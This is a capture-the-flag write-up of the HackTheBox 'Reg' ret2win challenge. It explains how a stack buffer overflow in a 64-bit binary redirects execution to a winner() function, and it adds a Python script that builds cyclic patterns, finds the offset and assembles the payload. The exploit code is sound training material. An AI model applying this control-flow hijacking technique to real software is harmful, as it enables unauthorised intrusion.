We covered another example of a binary vulnerable to a buffer overflow. The binary has NX enabled, which prevents code execution on the stack, but our goal was to control the execution flow and redirect it to the "winner" function, which prints the flag. We generated a pattern to cause a segmentation fault, then used the address of the "winner" function so that the RIP register points to it after the segmentation fault is hit. This was part of the HackTheBox Reg challenge in the Intro to Binary Exploitation track.
Looking at the executable's information, we can see that it is a 64-bit binary and that it is not stripped, which means the debugging information has not been removed and the main function can be viewed easily. We analyzed this binary using Radare2. Our aim was to display the functions in the code and, most importantly, to focus on a function named winner().
This function prints the challenge flag only when a certain condition is met, so we want to redirect the execution flow of the code to call winner(). Instead of redirecting the execution flow to point at the return address, as is usual in regular binary exploitation scenarios, we redirect it to reach the winner function, and for that we first need to trigger a segmentation fault. Then we look up the address of the winner() function by displaying the list of functions in Radare2.
After hitting the segmentation fault, we take a look at the base pointer and the stack pointer to find the offset, which turned out to be 56. We then generate exactly 56 bytes of padding and append the address of the winner function.
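The pattern-and-offset step described above, as an added illustration that is not part of the original write-up: a De Bruijn cyclic pattern generator, a lookup that turns the bytes found at RSP after the fault into the offset (56 here), and the resulting stack layout of padding followed by the 8-byte little-endian winner() address. The winner() address is a placeholder, since the real one comes from the Radare2 function list for the challenge binary.

```python
import string
import struct
from functools import lru_cache

@lru_cache(maxsize=None)
def de_bruijn(alphabet: str = string.ascii_lowercase, n: int = 4) -> bytes:
    """De Bruijn sequence B(k, n): every n-byte window occurs exactly once, so a
    4-byte chunk read from a register after the crash maps to a single offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
            return
        a[t] = a[t - p]
        db(t + 1, p)
        for j in range(a[t - p] + 1, k):
            a[t] = j
            db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq).encode()

def cyclic(length: int) -> bytes:
    """Pattern fed to the binary to trigger the segmentation fault."""
    return de_bruijn()[:length]

def offset_from_crash(qword_at_rsp: bytes) -> int:
    """Offset in the pattern of the 8 bytes sitting at RSP when the fault hits,
    i.e. the distance from the buffer start to the saved return address
    (56 for Reg). Returns -1 if the bytes did not come from the pattern."""
    return de_bruijn().find(qword_at_rsp[:4])

def build_ret2win(offset: int, winner_addr: int) -> bytes:
    """Padding up to the saved return address, then winner()'s address as an
    8-byte little-endian qword; RET pops it into RIP, so nothing on the stack
    is executed and NX does not interfere with the redirect."""
    return b"A" * offset + struct.pack("<Q", winner_addr)
# Placeholder only: the real winner() address is read from Radare2's function list.
WINNER_ADDR_PLACEHOLDER = 0x401234

if __name__ == "__main__":
    pattern = cyclic(200)
    simulated_rsp = pattern[56:64]  # constructed: what the debugger shows at RSP
    off = offset_from_crash(simulated_rsp)
    print(f"offset={off} payload={build_ret2win(off, WINNER_ADDR_PLACEHOLDER).hex()}")
```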